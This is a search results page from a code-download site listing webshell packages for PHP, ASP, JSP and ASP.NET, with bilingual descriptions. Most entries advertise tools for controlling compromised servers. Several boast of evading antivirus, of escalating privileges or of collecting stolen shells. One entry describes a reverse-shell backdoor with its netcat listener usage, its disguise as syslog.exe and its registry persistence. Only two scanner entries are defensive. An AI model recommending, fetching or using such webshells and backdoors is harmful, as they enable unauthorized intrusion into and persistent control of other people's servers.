Welcome![Sign In][Sign Up]
Location:
Search - webshell

Search list

[PHPphp webshell

Description:

php webshell


Platform: | Size: 13158 | Author: aliangnet | Hits:

[SourceCodeWebShell管理器

Description: WebShell 全套源码
Platform: | Size: 2256326 | Author: liliang5250@163.com | Hits:

[Windows Developautogetwebshell

Description: 自动获取webshell的代码,适合中级人员学习参考-Obtain the webshell code automatically and fit the senior people to use as reference.
Platform: | Size: 1024 | Author: 杨光 | Hits:

[Firewall-Securitybinder2

Description: 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358. 程序会复制自身到c:\winnt\下名为syslog.exe,并在 HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.) 压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat- vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address 10.24.9.100, port 7358. procedures will copy itself to C : \ winnt \ named syslog.exe and HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVe
Platform: | Size: 12288 | Author: 张军 | Hits:

[Internet-NetworkWEBSHELL2

Description: WEBshell生成器源代码。网上收集。大家学习研究使用-WEBshell source code generator. Online collection. U.S. study to use
Platform: | Size: 19456 | Author: aaaaaaa | Hits:

[Windows Develop8384

Description: 很好的webshell 刚刚劫到的 和大家分享一下-Good webshell just robbed and the U.S. share
Platform: | Size: 17408 | Author: 王京宇 | Hits:

[Shell apino

Description: no.asp/asp版webshell nohack WebShell免杀版 - Beta3-no.asp/asp version webshellnohack WebShell kill-free version- Beta3
Platform: | Size: 51200 | Author: 方小杰 | Hits:

[Windows DevelopWebShellScanner

Description: WEBSHELL扫描清理工具. 可以自动查找出网页代码中的WEBSHELL页面.-webshellscan tools
Platform: | Size: 104448 | Author: black | Hits:

[WEB Codej_13553_asp-webshell

Description: 【Wxy小组内部asp-webshell超强版】 详细功能介绍: 1:增加Serv-u加FTP通杀版! 2:增加检测可修改的目录! 3:能准确的查看系统管理员帐户! 4:能检测系统安装了那些可利用软件! 5:增加文件下载功能,直接从网络上下载文件至服务器,这样方便无法上传文件! 6:注册表操作更加详细,让一些不懂操作注册表的用户只需复制粘贴即可查看! 7:详细在顶部提供各类可提权利用的目录,方便大家直接查看! 8.优化代码,使用最新技术 提权成功达90 以上! 具体功能大家自己使用的时候自己体会! -【Sub-Wxy internal version of asp-webshell Superacid Introduction】 detailed features: 1: to increase FTP add Serv-u version of Qualcomm kill! 2: Detect can be modified to increase the directory! 3: to get a better view of the system administrator account! 4: can detection system which can be used to install software! 5: Increase file download directly from the network to download files on the server, so can not upload files Convenience! 6: Registry operation in more detail, so that some users do not know how to operate the registry only need to copy and paste to see! 7: all kinds of details can be provided at the top of the right to use the directory to facilitate direct view! 8. optimize the code, the right to use the latest technology to more than 90 Successful! The use of specific features of the U.S. when their own experience!
Platform: | Size: 37888 | Author: xiaona | Hits:

[Otherwebshell

Description: 一个小巧美观的asp 大马,未加密且免杀大部分杀软-Asp a small beautiful Malaysia, unencrypted and free to kill the majority of soft-kill
Platform: | Size: 13312 | Author: 浊风 | Hits:

[WEB CodeDecryption-WEBSHELL

Description: 坊间流传的ASP WEBSHELL几乎全部加密,而且带有后门,此版本为开源解密版.而且后门以剔除.-Is widely circulated that the ASP WEBSHELL almost all the encryption, but also with the back door, this version is open-source decrypted. But also to remove the back door.
Platform: | Size: 17408 | Author: 转行做站长 | Hits:

[Other1

Description: asp.net webshell 一个强悍的aspxshe-asp.net webshell
Platform: | Size: 11264 | Author: hhy | Hits:

[Internet-Networkdelphi_Webshellcl

Description: delphi Webshell马客户端-client delphi Webshell Ma
Platform: | Size: 280576 | Author: syk | Hits:

[JSP/JavaJSPWebShell

Description: 一个可实现代理的Jsp webshe-One can realize agent Jsp webshell
Platform: | Size: 9216 | Author: congrong | Hits:

[Remote Controlwebshell

Description: 这是从那儿下载的,一个老外写的webshe-This is downloaded from there, a foreigner writing webshell
Platform: | Size: 116736 | Author: 蓝城 | Hits:

[JSP/Javawebshell

Description: webshell.jsp webshell.jsp-webshell webshell.jsp
Platform: | Size: 9216 | Author: 忘了 | Hits:

[Remote Controlwebshell

Description: 用于远程控制php服务器的一段代码。。php文件。-Php server for remote control of a section of code. . php file.
Platform: | Size: 5120 | Author: 钱程序 | Hits:

[WEB Codescanwebshell

Description: 网马清道夫是一款扫描网站木马(webshell)的程序。-this is scanwebshell for website.
Platform: | Size: 4096 | Author: 李东卫 | Hits:

[Internet-Networkwebshell-or-system-privileges

Description: mssql中public和db_owner权限下拿到webshell或者系统权限 - [入侵渗透] -mssql in the public and db_owner privileges or system privileges to get webshell- [intrusion penetration]
Platform: | Size: 16384 | Author: zhaoyadong | Hits:

[WEB CodeWEBSHELL箱子系统V2.0

Description: webshell,箱子,自动收集webshell,在线查看shell,箱子程序源码,网站(Web shell, box, automatic collection of web shell, online viewing shell, box source code, website)
Platform: | Size: 66560 | Author: 锋芒s | Hits:
« 12 3 4 5 »

CodeBus www.codebus.net